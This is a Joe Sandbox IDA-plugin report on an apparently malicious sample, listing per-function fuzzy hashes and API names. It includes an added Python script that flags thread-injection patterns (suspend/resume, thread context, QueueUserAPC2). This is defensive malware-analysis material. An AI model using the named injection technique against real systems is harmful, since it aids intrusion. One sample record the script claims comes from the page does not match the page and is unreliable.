                                                • Opcode ID: 62520b32a1776006d55512af80ac8e0ed9ea9f0ad031f078303fc6a319a57c75
                                                • Instruction ID: 4bb490627eb984b3d89af819477230e960217adfe69f8668c6d7735670354cef
                                                • Opcode Fuzzy Hash: 62520b32a1776006d55512af80ac8e0ed9ea9f0ad031f078303fc6a319a57c75
                                                • Instruction Fuzzy Hash: DEF13862F3859386F7B84B389C017B96252EF91304F5C9274DA9E96FC8EE3DE9418344
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 12da843875923fdc3eafda57ca72649bed6bc1ea7f40d8fdbfd8baac54bfade6
                                                • Instruction ID: c25a14d69a79035201b876453107040f792b9dfe8ac8df483a69d547bd60d31b
                                                • Opcode Fuzzy Hash: 12da843875923fdc3eafda57ca72649bed6bc1ea7f40d8fdbfd8baac54bfade6
                                                • Instruction Fuzzy Hash: D102A572A58A8686EB549F65D4406787764AB45BE4F48C336DA2EE7FD0CF3CE441C308
                                                Similarity
                                                • API ID: CounterPerformanceQuery
                                                • String ID:
                                                • API String ID: 2783962273-0
                                                • Opcode ID: 0046277a4a63688f8226c38b0a832a454e8e1dc3ef7b8787d107a71e26a4fca3
                                                • Instruction ID: efed2282879e411c4e518d76c0c9b55417e767916900af83f6caa6b64a05bbfd
                                                • Opcode Fuzzy Hash: 0046277a4a63688f8226c38b0a832a454e8e1dc3ef7b8787d107a71e26a4fca3
                                                • Instruction Fuzzy Hash: 8802A562A59B4285FA95DB34985037867A1BF48B94F5CC235CD4FF2BA1DF3CE482C208
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 21cb066ba30a2d58ebcf8ae559d9ba3061f44fe4dc0b64825ad821ff6f3f83a3
                                                • Instruction ID: 4adfc0492b0bb3058a122d19e2d163cb15bc2eeb33ead989797426add29844f6
                                                • Opcode Fuzzy Hash: 21cb066ba30a2d58ebcf8ae559d9ba3061f44fe4dc0b64825ad821ff6f3f83a3
                                                • Instruction Fuzzy Hash: 39D18AB3A14B8883EB998F25E048AA837A9F359BC8F584035DE0E5BB44DF38D644C754
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 71e65aae111a7e0b8408b2be1a0ef47df2ba8d263406ac7333b0cd756308d3e6
                                                • Instruction ID: 5d73233db330ba7a77501056077aeef5ecfc5aab49609587fb31e98bc2354d98
                                                • Opcode Fuzzy Hash: 71e65aae111a7e0b8408b2be1a0ef47df2ba8d263406ac7333b0cd756308d3e6
                                                • Instruction Fuzzy Hash: E6615B94E2814695EE59AB72EC510F992611F56BC0F4C6031E81EFBFA3EE1CE41A874C
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3a5daeb43570b4afd4445f940d7c48c5abcaba4c72eaa1ed16e83e212e647b85
                                                • Instruction ID: f518d80861bbe5910a15bc00e205347f10ae6ec8d39a319b0d4fd6dd3d161ee1
                                                • Opcode Fuzzy Hash: 3a5daeb43570b4afd4445f940d7c48c5abcaba4c72eaa1ed16e83e212e647b85
                                                • Instruction Fuzzy Hash: D0D18232A49B8682E7A0DB35E84037E73A1FB44798F584136D94EA3B91DF3CE4958708
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c5d97b2ee4cf179bc4efdbce6b8c0359fec989a8c2a2af27bcf7251089b9314c
                                                • Instruction ID: 4bbcba5113666716e7ac663f43f9de5c3e73a330690efadd6acbad37178558ef
                                                • Opcode Fuzzy Hash: c5d97b2ee4cf179bc4efdbce6b8c0359fec989a8c2a2af27bcf7251089b9314c
                                                • Instruction Fuzzy Hash: 1071F533B18295C6E7258B3994405BD7761EB88B90F5D8031DE4DD3B42EE3CE981DB49
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7f3baeb11f508d9df96f7dec6d674138a29e73c9ff3c206315f0f1c2669d3fcb
                                                • Instruction ID: 973b219fa40080eaeedae9716a719f3c2b9e231bb358812f3b53590910b97d70
                                                • Opcode Fuzzy Hash: 7f3baeb11f508d9df96f7dec6d674138a29e73c9ff3c206315f0f1c2669d3fcb
                                                • Instruction Fuzzy Hash: 66C18E32A58A4682FA848B25E84417877A5FB447E0F4DC235C96EE7FA1DF3CE491C309
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fb4f35875fc796b0f3ddd2d634b66067a0974921a0bb6a5596afbdc2a062e503
                                                • Instruction ID: ff42f1937e069535509b426fee40868b33eaea91b34afddc296c8208c04a7d95
                                                • Opcode Fuzzy Hash: fb4f35875fc796b0f3ddd2d634b66067a0974921a0bb6a5596afbdc2a062e503
                                                • Instruction Fuzzy Hash: 81C17631A68B4681EA908B35E81027C77A5FB457A4F5C4236C96EA7FA0DF3CE591C708
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                 • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 86c9ebb636796ca0e2a1abc168f63624881ec9cfa17a1a52ac6cfbaa34e87d82
                                                • Instruction ID: 8f6827f492e24d24fc26cada5940442f40a678e01e3b5e92c4ca9bce77d573e1
                                                • Opcode Fuzzy Hash: 86c9ebb636796ca0e2a1abc168f63624881ec9cfa17a1a52ac6cfbaa34e87d82
                                                • Instruction Fuzzy Hash: 4C91CBB3A20B5987DB58CF39D84122933A1F744BE8B145239CE6D57B98DF38D851CB80
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                 • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 409c229b9efc82fb36608608548fe9079849a2670775322de54876e08707bc46
                                                • Instruction ID: 098938a1fc89e046a50e84ed727e8218785ef0b53bedf1643fb40660202bf65f
                                                • Opcode Fuzzy Hash: 409c229b9efc82fb36608608548fe9079849a2670775322de54876e08707bc46
                                                • Instruction Fuzzy Hash: 394192A1A0915299EB44AB72EC818FA66505F46FC0F4C8031ED1EF7FA3DE1CE5468749
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                 • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1520ecc627e78f6f296a930b5ad1567f454733ec3bf030dcbb6867c4c223546e
                                                • Instruction ID: 1f60d86c70578a1339d06f8be497069d5b1ca3afa46f810fe1c3f18886616666
                                                • Opcode Fuzzy Hash: 1520ecc627e78f6f296a930b5ad1567f454733ec3bf030dcbb6867c4c223546e
                                                • Instruction Fuzzy Hash: ED412861E6CB4A41E9958B37A94063892529F5B7E0F2CC731D91EBBFD1EF3CB0854208
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                 • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d01d92c36cf49476ab487aa00d9e6613e9ef98e3604ac2f9606348045db3d20f
                                                • Instruction ID: 06e01ac96a12101ed7a68b687f812b1c0b49ffc2b52f60ffdc67fc6bc0361639
                                                • Opcode Fuzzy Hash: d01d92c36cf49476ab487aa00d9e6613e9ef98e3604ac2f9606348045db3d20f
                                                • Instruction Fuzzy Hash: BA412721B15B4E42FA95873A51116B95252AF5A7C4F1CCB32DE0EF6F92EF3CF0418205
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                 • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4f5e3a5f36c742acf23e0f67f47f7e35e288f742c5cbb7463714353c7f299c5f
                                                • Instruction ID: 4995393b6d73f26613ce4e869a517c35993a7b96c2aaaa3d0d68e8a0da4bee5c
                                                • Opcode Fuzzy Hash: 4f5e3a5f36c742acf23e0f67f47f7e35e288f742c5cbb7463714353c7f299c5f
                                                • Instruction Fuzzy Hash: 4D21A732F09685C6D7189F25E4405AEA362FF98749F189534DA8C97B5AEE3CC851C708
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                 • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a6ce15b705df1a525a362b136f320cd7ebac4ee5d2a4b91d5a0a8bc25f3be7d2
                                                • Instruction ID: d407a8db24c56dffce5066567edaeef0c298932cfa53728affb8d6b2607d3f05
                                                • Opcode Fuzzy Hash: a6ce15b705df1a525a362b136f320cd7ebac4ee5d2a4b91d5a0a8bc25f3be7d2
                                                • Instruction Fuzzy Hash: A721DA22B2824142EFE4873AA29667E1350EB897C0F9C6031DE0D93E46DD1CE4818A08
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                 • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID: ExceptionFailFastRaise$Sleep
                                                • String ID:
                                                • API String ID: 3706814929-0
                                                • Opcode ID: d20306b9d74ff1c3dcfd4b0331d8a064e7e4a167fcad3e41ad7a5e05a6cf805d
                                                • Instruction ID: 7d0894177f64ac2f9074819bea4f0531d8a01f5df1a27522ef5df339b90744e8
                                                • Opcode Fuzzy Hash: d20306b9d74ff1c3dcfd4b0331d8a064e7e4a167fcad3e41ad7a5e05a6cf805d
                                                • Instruction Fuzzy Hash: 6821F932B1864642FBA09B7AF494B6B7651EBD4780F894031EE4FE2E94ED3CD0098708
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                 • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c91ad571f7de6f39c899d6f2da8f9893909e3427eea3a74341dff6ea753e2615
                                                • Instruction ID: b20ab173f8006c878f2ac7366c1b84a237b5ec0ead73a1299727491a0a60e340
                                                • Opcode Fuzzy Hash: c91ad571f7de6f39c899d6f2da8f9893909e3427eea3a74341dff6ea753e2615
                                                • Instruction Fuzzy Hash: 1A11C232F0914587DB188F25E4405AAA362FB88748F18D534DA8CDBB4DFE3CC8818708
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                 • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d163aa0276cdbe7ab7494f518498ab7c341e223f84200f380b0b19d626e36546
                                                • Instruction ID: 092155b84debfb5656330c0a0744604691aeb981c3bbf1c50d804e0ce0c06a43
                                                • Opcode Fuzzy Hash: d163aa0276cdbe7ab7494f518498ab7c341e223f84200f380b0b19d626e36546
                                                • Instruction Fuzzy Hash: 9AF09651E2520685DE55BB32FC450F962609F45780F485034D91EABF52EE2CE4458748
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                 • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fa66132e240f2b1eda32182dae148967ed333e9fb7865c2107637e77a9023a67
                                                • Instruction ID: a7f32262c88462ab4824dde9258b5b0eecd9c4a7fef4b337e532330c1010db77
                                                • Opcode Fuzzy Hash: fa66132e240f2b1eda32182dae148967ed333e9fb7865c2107637e77a9023a67
                                                • Instruction Fuzzy Hash: 1DF08C50E2810685EE48BF32EC410B892701F4A780F4C2031E80EFBE63AD1CE809434C
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                 • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID: ConditionMaskThread$AddressProc$ContextCurrentErrorInfoLastLibraryLoadProcessResumeSuspendVerifyVersion
                                                • String ID: IsWow64Process2$QueueUserAPC2$kernel32
                                                • API String ID: 2652322181-269241671
                                                • Opcode ID: 66f69495e65e7569fab1ee3eca8218c4ab18840aceecc73612b5da8ed725d5cc
                                                • Instruction ID: 507169d04699c528efe726d42bf7c0d5ccd1f638a9ff08947bbea21bdbb06524
                                                • Opcode Fuzzy Hash: 66f69495e65e7569fab1ee3eca8218c4ab18840aceecc73612b5da8ed725d5cc
                                                • Instruction Fuzzy Hash: BA519F35A0974281EBA4DF35E8542B963A1EF88B94F481235C96EE7F94DF3CD806C704
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                 • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID: ConditionMaskThread$AddressProc$ContextCurrentErrorInfoLastLibraryLoadProcessResumeSuspendVerifyVersion
                                                • String ID: IsWow64Process2$QueueUserAPC2$kernel32
                                                • API String ID: 2652322181-269241671
                                                • Opcode ID: b037745baa6da5cfcea9aa83ba2a3fcd93fe532d42f2725a16f9f08e5f2abdaf
                                                • Instruction ID: 5a677f2e78c7ed19915fda2ec13a5fcde4cc868f267dba101ee21e5dcde8ca43
                                                • Opcode Fuzzy Hash: b037745baa6da5cfcea9aa83ba2a3fcd93fe532d42f2725a16f9f08e5f2abdaf
                                                • Instruction Fuzzy Hash: D1519D34A0974281EBA4DF31E8642B963A1EF88B94F480135C95EE7F94DF3CD806C704
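The two records above share one API ID and one String ID, and their Instruction Fuzzy Hashes differ in only a handful of hex positions: they are the function behind the report's thread-injection signatures (the API ID field is Joe Sandbox's word-compressed list of called APIs; its tokens read as version checking via a condition mask, GetProcAddress/LoadLibrary resolution of kernel32 exports, thread-context access and suspend/resume, with IsWow64Process2 and QueueUserAPC2 as the resolved names). The script below is an added example for this page, not code from Joe Sandbox or its IDA plugin. It parses the Similarity records as they appear in the report text, tokenises the API ID field, flags functions whose API and string sets match an injection pattern, and groups near-identical functions by position-wise agreement of their fuzzy hashes. The indicator table and the hash-similarity heuristic are assumptions of the example, not the plugin's own scoring; the SAMPLE text is constructed from records on this page, shortened to the fields the script uses.

```python
"""Triage helper for the per-function 'Similarity' records of a Joe Sandbox report.

Added example; not Joe Sandbox code. Indicator table and similarity heuristic
are assumptions of this example. SAMPLE is constructed from records on the page.
"""
import re
from dataclasses import dataclass

SAMPLE = """\
Similarity
• API ID: ConditionMaskThread$AddressProc$ContextCurrentErrorInfoLastLibraryLoadProcessResumeSuspendVerifyVersion
• String ID: IsWow64Process2$QueueUserAPC2$kernel32
• Instruction Fuzzy Hash: BA519F35A0974281EBA4DF35E8542B963A1EF88B94F481235C96EE7F94DF3CD806C704
Similarity
• API ID: ConditionMaskThread$AddressProc$ContextCurrentErrorInfoLastLibraryLoadProcessResumeSuspendVerifyVersion
• String ID: IsWow64Process2$QueueUserAPC2$kernel32
• Instruction Fuzzy Hash: D1519D34A0974281EBA4DF31E8642B963A1EF88B94F480135C95EE7F94DF3CD806C704
Similarity
• API ID: strcmp
• String ID: GCHeapHardLimit$GCHeapHardLimitLOH$GCHeapHardLimitPercent
• Instruction Fuzzy Hash: 33412C25E08B4240FA94A739A95027912A2AF517F4F4C0371D87DB7ED9EF2CE946D708
Similarity
• API ID: ExceptionFailFastRaise$Sleep
• String ID:
• Instruction Fuzzy Hash: 6821F932B1864642FBA09B7AF494B6B7651EBD4780F894031EE4FE2E94ED3CD0098708
"""

# One bulleted "Key: value" line of a record (empty value allowed).
FIELD = re.compile(r"^\s*[•\-*]\s*([A-Za-z ]+?):\s*(.*)$")


@dataclass
class FunctionRecord:
    api_id: str = ""
    string_id: str = ""
    fuzzy_hash: str = ""

    def api_tokens(self) -> set[str]:
        # The API ID is camel-case words joined per frequency group with '$';
        # split the groups, then the words: 'ContextCurrent' -> {'Context', 'Current'}.
        return {t for grp in self.api_id.split("$")
                for t in re.findall(r"[A-Z][a-z0-9]*|[a-z0-9]+", grp)}

    def strings(self) -> set[str]:
        return {s for s in self.string_id.split("$") if s}


def parse_records(text: str) -> list[FunctionRecord]:
    """Each 'Similarity' heading starts a new record; following bullets fill it."""
    records: list[FunctionRecord] = []
    for line in text.splitlines():
        if line.strip() == "Similarity":
            records.append(FunctionRecord())
            continue
        m = FIELD.match(line)
        if not m or not records:
            continue
        key, value = m.group(1).strip(), m.group(2).strip()
        if key == "API ID":
            records[-1].api_id = value
        elif key == "String ID":
            records[-1].string_id = value
        elif key == "Instruction Fuzzy Hash":
            records[-1].fuzzy_hash = value
    return records


# Assumed indicator table: (reason, predicate over (api tokens, strings)).
INJECTION_INDICATORS = [
    ("thread context read/write", lambda a, s: {"Context", "Thread"} <= a),
    ("suspend/resume of target thread", lambda a, s: {"Suspend", "Resume"} <= a),
    ("runtime resolution of kernel32 exports",
     lambda a, s: {"Address", "Proc"} <= a and "kernel32" in {x.lower() for x in s}),
    ("APC queueing", lambda a, s: any(x.startswith("QueueUserAPC") for x in s)),
    ("WoW64 check before injection", lambda a, s: "IsWow64Process2" in s),
]


def injection_score(rec: FunctionRecord) -> tuple[int, list[str]]:
    a, s = rec.api_tokens(), rec.strings()
    reasons = [why for why, pred in INJECTION_INDICATORS if pred(a, s)]
    return len(reasons), reasons


def fuzzy_similarity(h1: str, h2: str) -> float:
    """Position-wise agreement of two hex digests (heuristic, not the plugin's metric)."""
    if len(h1) != len(h2) or not h1:
        return 0.0
    return sum(x == y for x, y in zip(h1, h2)) / len(h1)


def cluster_by_hash(records: list[FunctionRecord], threshold: float = 0.8) -> list[list[int]]:
    """Greedy grouping: a record joins the first cluster whose representative is similar enough."""
    clusters: list[list[int]] = []
    for i, rec in enumerate(records):
        for c in clusters:
            if fuzzy_similarity(records[c[0]].fuzzy_hash, rec.fuzzy_hash) >= threshold:
                c.append(i)
                break
        else:
            clusters.append([i])
    return clusters


def triage(text: str, min_score: int = 3) -> list[dict]:
    """Return the records that hit at least `min_score` injection indicators."""
    hits = []
    for i, rec in enumerate(parse_records(text)):
        score, reasons = injection_score(rec)
        if score >= min_score:
            hits.append({"index": i, "hash": rec.fuzzy_hash[:16], "score": score, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in triage(SAMPLE):
        print(hit)
    print("clusters:", cluster_by_hash(parse_records(SAMPLE)))
```

Run on the full report text, the same parser works unchanged (the extra Opcode ID / Instruction ID bullets are ignored); raise `min_score` or extend `INJECTION_INDICATORS` to taste, and use the hash clusters to avoid reviewing the same function twice when the sandbox has split it into near-identical records as it did here.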
                                                APIs
                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF658563CD7,?,?,?,?,00007FF65855CCE5), ref: 00007FF65855D7DE
                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF658563CD7,?,?,?,?,00007FF65855CCE5), ref: 00007FF65855D806
                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF658563CD7,?,?,?,?,00007FF65855CCE5), ref: 00007FF65855D826
                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF658563CD7,?,?,?,?,00007FF65855CCE5), ref: 00007FF65855D846
